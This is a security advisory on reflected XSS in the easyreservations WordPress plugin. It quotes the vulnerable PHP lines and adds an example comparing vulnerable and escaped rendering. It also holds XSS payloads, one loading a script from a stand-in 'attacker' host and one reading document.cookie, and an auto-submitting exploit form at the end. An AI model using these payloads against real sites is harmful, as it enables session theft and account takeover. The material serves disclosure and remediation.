Advisory #: 904
Title: Reflected XSS in WordPress plugin easyreservations v3.5
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/easyreservations
Downloads: 107784
Vendor Notified: 2016-02-09
Vendor Contact: plugins@wordpress.org
Plugin Name: easyreservations
Vulnerability:
There is a reflected XSS vulnerability in the following PHP code in ./easyreservations/easyReservations_admin_main.php. Each excerpt is prefixed with its line number in the plugin source; POST parameters are echoed directly into HTML attribute values and into an inline <script> block without any escaping.

Line 1413:
<td><input type="text" name="name" value="<?php if(isset($_POST['name'])) echo $_POST['name']; ?>" align="middle"></td>

Line 1420:
<td><input type="text" id="datepicker" style="width:80px" name="date" value="<?php if(isset($_POST['date'])) echo $_POST['date']; ?>" onchange="easyreservations_send_price_admin();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(1);<?php }?>"> <select name="from-time-hour" id="from-time-hour" onchange="easyreservations_send_price_admin();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(0);<?php }?>"><?php echo easyreservations_time_options($fromtimeh); ?></select>:<select name="from-time-min"><?php echo easyreservations_num_options("00",59,$fromtimem); ?></select></td>

Line 1427:
<td><input type="text" id="datepicker2" style="width:80px" name="dateend" value="<?php if(isset($_POST['dateend'])) echo $_POST['dateend']; ?>" onchange="easyreservations_send_price_admin();changer();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(2);<?php }?>"> <select name="to-time-hour" id="to-time-hour" onchange="easyreservations_send_price_admin();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(0);<?php }?>"><?php echo easyreservations_time_options($totimeh); ?></select>:<select name="to-time-min"><?php echo easyreservations_num_options("00",59,$totimem); ?></select></td>

Line 1449:
<td><input type="text" name="email" value="<?php if(isset($_POST['email'])) echo $_POST['email']; ?>" onchange="easyreservations_send_price_admin();"></td>

Line 1530:
<?php if(isset($_POST['room-saver-to'])){ ?><script>jQuery(document).ready(function(){ fakeClick('<?php echo $_POST['room-saver-from']; ?>','<?php echo $_POST['room-saver-to']; ?>','<?php echo $_POST['room']; ?>','<?php echo $_POST['roomexactly']; ?>', '');setVals2(<?php echo $_POST['room'].','.$_POST['roomexactly']; ?>);document.getElementById('datepicker').value='<?php echo date(RESERVATIONS_DATE_FORMAT, $_POST['room-saver-from']); ?>';document.getElementById('datepicker2').value='<?php echo date(RESERVATIONS_DATE_FORMAT, $_POST['room-saver-to']); ?>';easyreservations_send_price_admin();});</script><?php } //Set Room and Roomexactly after click on Overview and redirected to add

The POST parameters name, date, dateend, email, room-saver-from, room-saver-to, room and roomexactly are sent back to the user's browser unsanitized. The first four are reflected inside double-quoted value attributes, so a payload only needs a " to close the attribute and start a new tag. The last four are reflected inside the inline script: room-saver-from, room-saver-to, room and roomexactly as single-quoted JavaScript string arguments to fakeClick(), and room and roomexactly again as bare arguments to setVals2(), where no quote character is needed at all to inject JavaScript.
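The following is an added example, not code from the advisory or from the easyreservations plugin. It reproduces the two reflection patterns quoted above (the value="" attribute from line 1413 and the inline <script> from line 1530) in a standalone PHP CLI script, once rendered the way the plugin does it and once with escaping appropriate to each output context. The $post array stands in for $_POST and carries a constructed payload; treating the room-saver-*, room and roomexactly values as integers is an assumption drawn from the quoted code, which passes room-saver-* to date() and uses room/roomexactly as numeric arguments.

```php
<?php
// Added example, not code from the advisory or the easyreservations plugin.
// Reproduces the reflections from easyReservations_admin_main.php lines 1413
// and 1530 as the plugin renders them, then with context-appropriate escaping.
// $post stands in for $_POST and holds a constructed attacker payload.

$post = [
    // Breaks out of the double-quoted value attribute, as in the exploit below.
    'name'            => '"><script src=http://attacker/bad.js></script>',
    // Breaks out of the single-quoted JavaScript string passed to fakeClick().
    'room-saver-from' => "1455019200');alert(document.cookie);//",
    'room-saver-to'   => '1455105600',
    // Lands unquoted inside the setVals2() argument list.
    'room'            => '3',
    'roomexactly'     => '0',
];

// Vulnerable rendering: raw POST values concatenated into HTML and JavaScript,
// mirroring the "echo $_POST[...]" calls quoted from the plugin.
function render_vulnerable(array $post): string
{
    $out  = '<input type="text" name="name" value="' . $post['name'] . '">' . "\n";
    $out .= "<script>fakeClick('" . $post['room-saver-from'] . "','" . $post['room-saver-to'] . "');"
          . 'setVals2(' . $post['room'] . ',' . $post['roomexactly'] . ');</script>';
    return $out;
}

// Hardened rendering: escape each value for the exact context it is written into.
//  - HTML attribute: htmlspecialchars() with ENT_QUOTES encodes both " and '
//    (inside WordPress, esc_attr() does the same job).
//  - Script block: the plugin feeds room-saver-* to date(), which needs integer
//    timestamps, and uses room/roomexactly as numbers, so cast them to int
//    (WordPress: absint()). No quote or script text can survive the cast.
//    Assumption: these four values really are numeric in the plugin.
function render_hardened(array $post): string
{
    $name    = htmlspecialchars($post['name'] ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $from    = (int) ($post['room-saver-from'] ?? 0);   // "1455019200');alert..." -> 1455019200
    $to      = (int) ($post['room-saver-to'] ?? 0);
    $room    = (int) ($post['room'] ?? 0);
    $exactly = (int) ($post['roomexactly'] ?? 0);

    $out  = '<input type="text" name="name" value="' . $name . '">' . "\n";
    $out .= "<script>fakeClick('{$from}','{$to}');setVals2({$room},{$exactly});</script>";
    return $out;
}

echo "--- vulnerable: payload escapes both the attribute and the JS string ---\n";
echo render_vulnerable($post), "\n\n";
echo "--- hardened: payload is inert text or a plain integer ---\n";
echo render_hardened($post), "\n";
```

In the vulnerable output the name value closes the attribute and injects a script tag, and room-saver-from closes the fakeClick() string literal and appends alert(document.cookie). In the hardened output the same name value appears as &quot;&gt;&lt;script ...&gt; inside the attribute and room-saver-from is reduced to 1455019200. The point is that each parameter needs the escaping of its own output context: attribute escaping alone would not protect the unquoted setVals2() arguments, and quoting alone would not protect the value attributes.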
CVE-ID: Not Released
File:./easyreservations/easyReservations_admin_main.php
Exploit Code:
The exploit targets the first vulnerable parameter found in the code (name); the other parameters listed above are likely exploitable in the same way. This is an untested, autogenerated exploit. The page auto-submits a POST request carrying the payload, following the technique described at http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html. The value attribute is HTML-entity encoded so that the browser decodes it to "><script src=http://attacker/bad.js></script> before submitting the form.

<form name=TheForm action=http://[target]/wp-content/plugins/easyreservations/easyReservations_admin_main.php method=post>
  <input type=hidden name=name value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;>
</form>
<script>
  document.TheForm.submit();
</script>